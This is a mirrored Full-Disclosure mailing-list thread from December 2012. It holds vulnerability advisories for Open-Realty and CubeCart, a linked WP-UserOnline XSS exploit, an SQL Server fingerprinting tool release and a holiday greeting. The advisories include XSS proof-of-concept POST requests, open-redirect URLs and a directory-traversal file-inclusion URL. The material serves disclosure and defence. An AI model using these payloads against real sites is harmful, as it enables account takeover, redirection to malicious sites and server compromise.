CHOON.NET Forums - Full-Disclosure

[Full-disclosure] Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability (no replies)

YGN Ethical Hacker Group — Tue, 25 Dec 2012 21:40:27 +0800

1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.

2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.

3. VULNERABILITY DESCRIPTION

Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions for majority of administrator
functions such as adding new user, assigning user to administrative
privilege. By using a crafted URL, an attacker may trick the victim
into visiting to his web page to take advantage of the trust
relationship between the authenticated victim and the application.
Such an attack could trick the victim into executing arbitrary
commands in the context of their session with the application, without
further prompting or verification.

4. VERSIONS AFFECTED

3.x

5. PROOF-OF-CONCEPT/EXPLOIT

6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.

7. VENDOR

Transparent Technologies Inc.
[www.transparent-support.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
Open-Realty Home Page: [www.open-realty.org]

#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Merry Christmas (no replies)

Daniel Preussker — Tue, 25 Dec 2012 21:25:33 +0800

Yes yes, its this time of the year again, everybody going nuts and weather is shite...

And to share this special time of the year with my beloved Full Disclosure, I dedicate this short spam for you ;)

Enjoy the holidays and I hope I see some of you at the 29th C3 in Hamburg, Germany!

Merry Christmas and a happy new year!

Daniel Preussker

[ Security Consultant, Network & Protocol Security and Cryptography
[ LPI & Novell Certified Linux Engineer and Researcher
[ +49 178 600 96 30
[ Daniel@Preussker.Net
[ [pgp.mit.edu]

PS: too bad Mayas were wrong :(_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability (no replies)

YGN Ethical Hacker Group — Tue, 25 Dec 2012 21:25:33 +0800

1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).

2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.

3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.

4. VERSIONS AFFECTED

3.x

5. PROOF-OF-CONCEPT/EXPLOIT

/admin/ajax.php (parameter: title, full_desc, ta)

///////////////////////////////////////////////////////

POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: [localhost]
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;

edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2¬es=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=

///////////////////////////////////////////////////////
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: [localhost]
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: [localhost]
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;

blogID=65&title=about+us&ta='">&description=&keywords=&status=1&seotitle=about-us
///////////////////////////////////////////////////////

6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.

7. VENDOR

Transparent Technologies Inc.
[www.transparent-support.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
Open-Realty Home Page: [www.open-realty.org]

#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Persistent XSS vulnerability in WP-UserOnline (no replies)

MustLive — Tue, 25 Dec 2012 05:43:29 +0800

Hello list!

in 2010 I've disclosed multiple vulnerabilities (Cross-Site Scripting and
Full path disclosure) in WordPress plugin WP-UserOnline
(http://securityvulns.ru/Ydocument162.html,
[seclists.org]). And recently I've disclosed
the exploit for persistent XSS vulnerability in WP-UserOnline. It must be
interesting for those who want to test this vulnerability.

Exploit:

[websecurity.com.ua]

This perl exploit I've developed at 26.04.2010.

As I've wrote earlier, vulnerable are WP-UserOnline 2.62 and previous
versions. After my informing the developer released WP-UserOnline 2.70 (at
07.05.2010). In version 2.70 he fixed XSS, but not Full path disclosure
vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
[websecurity.com.ua]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] [TOOL RELEASE] SQL Fingerprint powered by ENG++ Technology [Version 1.33.23-170308] (no replies)

Nelson Brito — Mon, 24 Dec 2012 20:42:02 +0800

Hello, everybody.

I am very happy to announce the Perl version of SQL Fingerprint (Christmas Release).

[Description]
Microsoft SQL Server fingerprinting can be a time consuming process, because it involves trial and error methods to determine the exact version. Intentionally inserting an invalid input to obtain a typical error message or using certain alphabets that are unique for certain server are two of the many ways to possibly determine the version, but most of them require authentication, permissions and/or privileges on Microsoft SQL Server to succeed.

Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:
• Database Administrators
• Database Auditors
• Database Owners
• Penetration Testers

Having over FIVE HUNDRED unique versions within its fingerprint database, ESF.pl currently supports fingerprinting for:
• Microsoft SQL Server 2000
• Microsoft SQL Server 2005
• Microsoft SQL Server 2008
• Microsoft SQL Server 2012

ESF.pl re-invented the techniques used by several public tools (SQLPing Tool by Chip Andrews, Rajiv Delwadia and Michael Choi, and SQLVer Tool by Chip Andrews). ESF.pl shows the MAPPED VERSION and PATCH LEVEL (i.e., Microsoft SQL Server 2008 SP1 (CU5)) instead of showing only the RAW VERSION (i.e., Microsoft SQL Server 10.0.2746). ESF.pl also has the ability to show the MOST LIKELY version, based on its sophisticated Scoring Algorithm Mechanism, and allows to determine vulnerable andunpatched Microsoft SQL Server better than many of public and commercial tools.

This version is a completely rewritten version in Perl, making ESF.pl much more portable than the previous binary version (Win32), and its original purpose is to be used as a tool to perform automated penetration test. This version also includes the followingMicrosoft SQL Server versions to its fingerprint database:
• Microsoft SQL Server 2012 SP1 (CU1)
• Microsoft SQL Server 2012 SP1
• Microsoft SQL Server 2012 SP1 CTP4
• Microsoft SQL Server 2012 SP1 CTP3
• Microsoft SQL Server 2012 SP0 (CU4)
• Microsoft SQL Server 2012 SP0 (MS12-070)
• Microsoft SQL Server 2012 SP0 (CU3)
• Microsoft SQL Server 2012 SP0 (CU2)
• Microsoft SQL Server 2012 SP0 (CU1)
• Microsoft SQL Server 2012 SP0 (MS12-070)
• Microsoft SQL Server 2012 SP0 (KB2685308)
• Microsoft SQL Server 2012 RTM

To achieve an accurate and much more reliable version fingerprinting, ESF.pl employes the following steps, mimicking a valid negotiation between the CLIENT and the SERVER:

• SSRP Client Unicast Request (CLNT_UCAST_EX)
• SSRP Client Unicast Instance Request (CLNT_UCAST_INST)
• TDS Pre-Login Request (PRELOGIN)

NOTE: ESF.pl IS NOT a SQLi tool, and has no ability to perform such task.

[Manual Page]
NAME
ESF.pl - SQL Fingerprint powered by *ENG++ Technology*

VERSION
This document describes ESF.pl [Version 1].

USAGE
"ESF.pl host [options]"

DESCRIPTION
Microsoft SQL Server fingerprinting can be a time consuming process,
because it involves trial and error methods to determine the exact
version. Intentionally inserting an invalid input to obtain a typical
error message or using certain alphabets that are unique for certain
server are two of the many ways to possibly determine the version, but
most of them require authentication, permissions and/or privileges on
Microsoft SQL Server to succeed.

Instead, ESF.pl uses a combination of crafted packets for SQL Server
Resolution Protocol ("SSRP") and Tabular Data Stream Protocol ("TDS")
(protocols natively used by Microsoft SQL Server) to accurately perform
version fingerprinting and determine the exact Microsoft SQL Server
version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism
(powered by *Exploit Next Generation++ Technology*), which is a much
more reliable technique to determine the Microsoft SQL Server version.
It is a tool intended to be used by:
* Database Administrators
* Database Auditors
* Database Owners
* Penetration Testers

Having over "FIVE HUNDRED" unique versions within its fingerprint
database, ESF.pl currently supports fingerprinting for:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* Microsoft SQL Server 2008
* Microsoft SQL Server 2012

ESF.pl re-invented the techniques used by several public tools (SQLPing
Tool by *Chip Andrews*, *Rajiv Delwadia* and *Michael Choi*, and SQLVer
Tool by *Chip Andrews*) (see "SEE ALSO" for further information). ESF.pl
shows the "MAPPED VERSION" and "PATCH LEVEL" (i.e., Microsoft SQL Server
2008 SP1 (CU5)) instead of showing only the "RAW VERSION" (i.e.,
Microsoft SQL Server 10.0.2746). ESF.pl also has the ability to show the
*MOST LIKELY* version, based on its sophisticated Scoring Algorithm
Mechanism, and allows to determine "vulnerable" and "unpatched"
Microsoft SQL Server better than many of public and commercial tools.

This version is a completely rewritten version in Perl, making ESF.pl
much more portable than the previous binary version (Win32), and its
original purpose is to be used as a tool to perform automated
penetration test. This version also includes the following Microsoft SQL
Server versions to its fingerprint database:
* Microsoft SQL Server 2012 SP1 (CU1)
* Microsoft SQL Server 2012 SP1
* Microsoft SQL Server 2012 SP1 CTP4
* Microsoft SQL Server 2012 SP1 CTP3
* Microsoft SQL Server 2012 SP0 (CU4)
* Microsoft SQL Server 2012 SP0 (MS12-070)
* Microsoft SQL Server 2012 SP0 (CU3)
* Microsoft SQL Server 2012 SP0 (CU2)
* Microsoft SQL Server 2012 SP0 (CU1)
* Microsoft SQL Server 2012 SP0 (MS12-070)
* Microsoft SQL Server 2012 SP0 (KB2685308)
* Microsoft SQL Server 2012 RTM

*NOTE: ESF.pl "IS NOT" a *SQLi* tool, and has no ability to perform
such task.*

Fingerprinting Steps
As described in "DESCRIPTION", ESF.pl uses a combination of crafted
packets for "SSRP" and "TDS" to accurately perform version
fingerprintfing. To achieve an accurate and much more reliable version
fingerprinting, ESF.pl employes the following steps, mimicking a valid
negotiation between the CLIENT and the SERVER:

1) "SSRP" "Client Unicast Request" (CLNT_UCAST_EX)
This step attempts to gather the Microsoft SQL Server single
instance or even multiple instances (see "MULTIPLE SQL SERVER
INSTANCES WARNING" for further information), and the respective
"TDS" communication port(s) - the "TDS" communication port for each
instances can be dynamic or default (see "DYNAMIC SQL SERVER TCP
PORT WARNING" and "DEFAULT SQL SERVER TCP PORT WARNING" for further
information).

*NOTE: If this step fails, the "STEP 2" is not performed and the
"STEP 3" will use "TDS" default communication port only.*

2) "SSRP" "Client Unicast Instance Request" (CLNT_UCAST_INST)
This step attempts to use the information gathered by *step 1* to
collect, parse and match information for a single instances or for
multiple instances (see "MULTIPLE SQL SERVER INSTANCES WARNING" for
further information). Once the collecting, parsing and matching is
done, the fingerprinting data is stored to be validated by the
sophisticated Scoring Algorithm Mechanism (powered by *Exploit Next
Generation++ Technology*).

*NOTE: If the "STEP 1" fails, this step is not performed.*

3) "TDS" "Pre-Login Request" (PRELOGIN)
This step attempts to use the information gathered by *step 1* to
collect, parse and match information for a single instances running
on "TDS" default coommunication port (see "DEFAULT SQL SERVER TCP
PORT WARNING" for further information) or for multiple instances
(see "MULTIPLE SQL SERVER INSTANCES WARNING" for further
information) running on "TDS" dynamic communication port(s) (see
"DYNAMIC SQL SERVER TCP PORT WARNING" for further information. Once
the collecting, parsing and matching is done, the fingerprinting
data is stored to be validated by the sophisticated Scoring
Algorithm Mechanism (powered by *Exploit Next Generation++
Technology*).

*NOTE: If "STEP 1" fails, this step will use "TDS" default
communication port only.*

SSRP
As described in "[MS-SQLR]: SQL Server Resolution Protocol"
specification document (see "SEE ALSO" for further information).

1) "1.3 Overview"
"The first case is used for the purpose of determining the
communication endpoint information of a particular database
instance, whereas the second case is used for enumeration of
database instances in the network and to obtain the endpoint
information of each instance." (*page 8*)

"The SQL Server Resolution Protocol does not include any facilities
for authentication, protection of data, or reliability. The SQL
Server Resolution Protocol is always implemented on top of the UDP
Transport Protocol [RFC768]." (*page 8*)

2) "1.9 Standards Assignments"
"The client always sends its request to UDP port 1434 of the server
or servers." (*page 10*)

3) "2.2.2 CLNT_UCAST_EX"
"The CLNT_UCAST_EX packet is a unicast request that is generated by
clients that are trying to determine the list of database instances
and their network protocol connection information installed on a
single machine. The client generates a UDP packet with a single
byte, as shown in the following diagram." (*page 11*)

4) "2.2.3 CLNT_UCAST_INST"
"The CLNT_UCAST_INST packet is a request for information related to
a specific instance. The structure of the request is as follows."
(*page 12*)

According to the previous quotes, the "SSRP" *is used for the purpose of
determining the communication endpoint information of a particular
database instance*, which *does not include any facilities for
authentication*, and both "SSRP" "CLNT_UCAST_EX Request" and "SSRP"
"CLNT_UCAST_INST Request" can be used *for the purpose of determining
the communication endpoint information*.

Based on this analysis, it is possible to determine the Microsoft SQL
Server version using the "SSRP" "CLNT_UCAST_EX Request" and/or "SSRP"
"CLNT_UCAST_INST Request". The version is available within the "SSRP"
"CLNT_UCAST_EX Response" and/or "SSRP" "CLNT_UCAST_INST Response", and
it is a gratuitous information sent from SERVER to CLIENT to ensure they
will establish a communication correctly, using the correct database
instance and the same dialect by both CLIENT and SERVER.

Here is a "SSRP" "CLNT_UCAST_INST Request" and "SSRP" "CLNT_UCAST_INST
Response" sample traffic dump between the ESF.pl and a Microsoft SQL
Server 2008 SP1:

"SSRP" "CLNT_UCAST_INST Request"
0000 04 4d 53 53 51 4c 53 45 52 56 45 52 .MSSQLSERVER

"SSRP" "CLNT_UCAST_INST Response"
0000 05 77 00 53 65 72 76 65 72 4e 61 6d 65 3b 53 45 .w.ServerName;SE
0010 52 56 45 52 30 34 3b 49 6e 73 74 61 6e 63 65 4e RVER04;InstanceN
0020 61 6d 65 3b 4d 53 53 51 4c 53 45 52 56 45 52 3b ame;MSSQLSERVER;
0030 49 73 43 6c 75 73 74 65 72 65 64 3b 4e 6f 3b 56 IsClustered;No;V
0040 65 72 73 69 6f 6e 3b 31 30 2e 30 2e 32 35 33 31 ersion;10.0.2531
0050 2e 30 3b 74 63 70 3b 31 34 33 33 3b 6e 70 3b 5c .0;tcp;1433;np;\
0060 5c 53 45 52 56 45 52 30 34 5c 70 69 70 65 5c 73 \SERVER04\pipe\s
0070 71 6c 5c 71 75 65 72 79 3b 3b ql\query;;

As demonstrated above, the information within the "SSRP" "CLNT_UCAST_EX
Response" represents the version for Microsoft SQL Server 2008 SP1
(*10.0.2531*), as well as many interesting information.

*NOTE: no authentication and gratuitous information.*

TDS
As described in "[MS-TDS]: Tabular Data Stream Protocol" specification
document (see "SEE ALSO" for further information).

1) "2.2.1.1 Pre-Login"
"Before a login occurs, a handshake denominated pre-login occurs
between client and server, setting up contexts such as encryption
and MARS-enabled." (*page 17*)

2) "2.2.2.1 Pre-Login Response"
"The pre-login response is a tokenless packet data stream. The data
stream consists of the response to the information requested by the
client pre-login message." (*page 18*)

3) "2.2.4.1 Tokenless Stream"
"As shown in the previous section, some messages do not use tokens
to describe the data portion of the data stream. In these cases, all
the information required to describe the packet data is contained in
the packet header. This is referred to as a tokenless stream and is
essentially just a collection of packets and data." (*page 24*)

4) "2.2.6.4 PRELOGIN"
"A message sent by the client to set up context for login. The
server responds to a client PRELOGIN message with a message of
packet header type 0x04 and the packet data containing a PRELOGIN
structure." (*page 59*)

"[TERMINATOR] [0xFF] [Termination token.]" (*page 61*)

"TERMINATOR is a required token, and it MUST be the last token of
PRELOGIN_OPTION. TERMINATOR does not include length and bits
specifying offset." (*page 61*)

According to the previous quotes, the "TDS" "Pre-Login" is just a
handshake, i.e., the "TDS" "Pre-Login" is a *tokenless packet data
stream* of the *pre-authentication state* to establish the negotiation
between the CLIENT and the SERVER - as described in "Figure 3: Pre-login
to post-login sequence" (*page 103*).

Based on this analysis, it is possible to determine the Microsoft SQL
Server version during the "TDS" "Pre-Login" handshake. It is an
undocumented feature, but it is not a bug or a leakage, in fact, it is
more likely to be an "AS IS" embedded feature that allows CLIENT to
establish a negotiation with SERVER. The version is available within the
"TDS" "Pre-Login Response" packet data stream, and it is a gratuitous
information sent from SERVER to CLIENT to ensure they will establish a
communication correctly, using the correct database instance and the
same dialect by both CLIENT and SERVER.

Here is a *tokenless packet data stream* sample traffic dump of a "TDS"
"Pre-Login" handshake between the ESF.pl and a Microsoft SQL Server 2008
SP1:

"TDS" "Pre-Login Request"
0000 12 01 00 2f 00 00 01 00 00 00 1a 00 06 01 00 20
0010 00 01 02 00 21 00 01 03 00 22 00 04 04 00 26 00
0020 01 ff 09 00 00 00 00 00 01 00 b8 0d 00 00 01

"TDS" "Pre-Login Response"
0000 04 01 00 2b 00 00 01 00 00 00 1a 00 06 01 00 20
0010 00 01 02 00 21 00 01 03 00 22 00 00 04 00 22 00
0020 01 ff 0a 00 09 e3 00 00 01 00 01

As demonstrated above, there are four bytes following the "TERMINATOR"
(*0xFF* at the OFFSET *34*), and they represent the version for
Microsoft SQL Server 2008 SP1 (*10.0.2531*):

1) OFFSET *35* represents the Major Version (0x0a = *10*)
2) OFFSET *36* represents the Minor Version (0x00 = *0*)
3) OFFSETS *37*/*38* represent the Build Version ([0x09*256]+0xe3 =
*2531*)

*NOTE: no authentication and gratuitous information.*

MULTIPLE SQL SERVER INSTANCES WARNING
Warns the availability of multiple instances ("Default Instances" as
well as "Named Instances"). This information is collected and parsed by
"STEP 1" and used and validated by "STEP 3" (see "Fingerprinting Steps"
for further information).

*NOTE: Only in "verbose" mode (see "OPTIONS" for further
information).*

DYNAMIC SQL SERVER TCP PORT WARNING
Warns the availability of multiple instances ("Default Instances" as
well as "Named Instances") running on "TDS" dynamic communication
port(s). This information is collected and parsed by "STEP 1" and used
and validated by "STEP 3" (see "Fingerprinting Steps" for further
information).

*NOTE: Only in "verbose" mode (see "OPTIONS" for further
information).*

DEFAULT SQL SERVER TCP PORT WARNING
Warns the availability of "Default Instances" running on "TDS" default
communication port(s) . This information is collected and parsed by
"STEP 1" and used and validated by "STEP 3" (see "Fingerprinting Steps"
for further information).

*NOTE: Only in "verbose" mode (see "OPTIONS" for further
information).*

MOST LIKELY WARNING
ADD DESCRIPTION HERE

OPTIONS
"-d,--debug" (default OFF)
Configure the debug mode, giving much more information details about
the fingerprinting tasks.

"-f,--fingerprintdb FILE" (default "ESF.db")
Configure an optional file for SQL Fingerprint Database.

"-t,--timeout NUM" (default 30)
Configure a specific connection timeout (seconds), allowing ESF.pl
to wait until close the connection.

"-T,--TIMEOUT NUM" (default 5)
Configure a specific timeout (seconds), allowing ESF.pl to wait
until execute the next subroutine.

"-v,--verbose" (default OFF)
Configure the verbose mode, giving information details about the
fingerprinting tasks.

"-m,--manpage"
Display the manual page embedded in ESF.pl, being the manual page in
POD (Plain Old Documentation) format.

"-h,-?,--help"
Display the help and usage message.

DEPENDENCIES
Digest::MD5(3)
See "Getopt::Long's Perl Documentation" for further information.

Getopt::Long(3)
See "Getopt::Long's Perl Documentation" for further information.

IO::Socket(3)
See "IO::Socket's Perl Documentation" for further information.

Pod::Usage(3)
See "Pod::Usage's Perl Documentation" for further information.

POSIX(1)
See "POSIX's Perl Documentation" for further information.

Switch(3)
See "Switch's Perl Documentation" for further information.

PERL(1) v5.10.1 or v5.12.4
ESF.pl has been widely tested under Perl v5.10.1 (Ubuntu 10.04 LTS)
and Perl v5.12.4 (OS X Mountain Lion). Due to this, ESF.pl requires
one of the mentioned versions to be executed. The following tests
will be performed to ensure its capabilities:

BEGIN {
my $subname = (caller(0))[3];
eval("require 5.012004;");
eval("require 5.010001;") if $@;
die "$subname\{\}: Unsupported Perl version ($]).\n" if $@;
}

*NOTE: If you are confident that your Perl version is capable to
execute the ESF.pl, please, remove the above tests and send
feedback to the author*.

See "PERL's Perl Documentation" for further information.

SEE ALSO
Digest::MD5(3), IO::Socket(3), Getopt::Long(3), Pod::Usage(3), POSIX(1),
Socket(3), Switch(3), PERL(1), [RFC793]
[www.ietf.org], [RFC768]
[www.ietf.org], TDS
[msdn.microsoft.com], SSRP
[msdn.microsoft.com], SQLPing &
SQLVer Tools [www.sqlsecurity.com]

HISTORY
2008
Private Release (Late 2008)

2009
H2HC Talk (November 28)

2010
MSSQLFP BETA-3 (January 5)

MSSQLFP BETA-4 (January 18)

ESF 1.00.0006 (February 10)

ESF 1.10.101008/CTP (October 8)

2012
ESF 1.12.120115/RC0 (January 15)

BUGS AND LIMITATIONS
Report ESF.pl bugs and limitations directly to the author.

AUTHOR
Nelson Brito .

COPYRIGHT
Copyright(c) 2010-2012 Nelson Brito. All rights reserved worldwide.

Exploit Next Generation++ Technology and/or other noted Exploit Next
Generation++ and/or ENG++ related products contained herein are
registered trademarks or trademarks of Nelson Brito. Any other
non-Exploit Next Generation++ related products, registered and/or
unregistered trademarks contained herein is only by reference and are
the sole property of their respective owners.

*Exploit Next Generation++ Technology*, innovating since 2010.

LICENSE
This program is free software: you can redistribute it and/or modify it
under the terms of the *GNU General Public License* as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.

You should have received a copy of the *GNU General Public License*
along with this program. If not, see [www.gnu.org].

DISCLAIMER OF WARRANTY
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *GNU
General Public License* for more details.

[Download and Source Code]
For immediately download, please, go to:
• [code.google.com]

Atenciosamente / Best regards / Saludos.

Nelson Brito
[about.me]

"Quemadmodum gladius neminem occidit, occidentis telum est." (Epistulae morales ad Lucilium, Lucius Annaeus Seneca)

Fingerprint: 1983 7E8E D6C9 CAF8 4B4F A8C9 A36D FC5B 4FFC 316C

#!/bin/sh -- # -*- perl -*-
eval 'exec `which perl` -x -S $0 ${1+"$@"} ;'
if 0;
{(($^O=~/^[M]*$32/i)&&($0=~s!.*\\!!))||($0=~s!^.*/!!)};

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:36:10 +0800

1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters, "r" and
"redir". This allows an attacker to create a specially crafted URL,
that if clicked, would redirect a victim from the intended legitimate
web site to an arbitrary web site of the attacker's choice.

4. VERSIONS AFFECTED

4.4.6 and lower

5. Affected URLs and Parameters

/index.php (r parameter)
/index.php (redir parameter)

/index.php?_g=sw&r=//yehg.net/
/index.php?_a=login&redir=//yehg.net

6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-06-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]
CubeCart Bug-Fix Announcement:
[forums.cubecart.com]
CubeCart4 End-of-Life Announcement:
[forums.cubecart.com]

#yehg [2012-12-24]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:36:10 +0800

1. OVERVIEW

CubeCart 4.x and 5.x versions are vulnerable to Setup Re-installation
Privilege Escalation.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.x and 5.x versions contain a flaw that does not remove
set-up installation directory or warn users of the existence of set-up
installation directory. This allows an attacker to re-install the
application, gain administrator access and do malicious things such as
uploading malicious shell script to compromise the application server.

4. VERSIONS AFFECTED

CubeCart 4.x and 5.x

5. Affected URL

N.A

6. SOLUTION/WORKAROUND

The vendor has chosen not to fix the issue.
Workaround is to remove setup directory after installation.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability Reported
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]

#yehg [2012-12-24]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:32:12 +0800

1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Local File Inclusion.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that may allow a
remote attacker to execute arbitrary commands or code. The issue is
due to the '/admin.php' script not properly sanitizing user input,
specifically directory traversal style attacks (e.g., ../../) supplied
to the 'loc' parameter. This may allow an attacker to include a file
from the targeted host that contains arbitrary commands or code that
will be executed by the vulnerable script. Such attacks are limited
due to the script only calling files already on the target host. In
addition, this flaw can potentially be used to disclose the contents
of any file on the system accessible by the web server.

4. VERSIONS AFFECTED

4.4.6 and lower

5. Affected URL and Parameter

/admin.php (loc parameter)
/admin.php?_g=filemanager/language&loc=/../../../public_ftp/uploads/hack.inc.php

6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]
CubeCart Bug-Fix Announcement:
[forums.cubecart.com]
CubeCart4 End-of-Life Announcement:
[forums.cubecart.com]

#yehg [2012-12-24]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:32:12 +0800

1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Request
Forgery (CSRF).

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
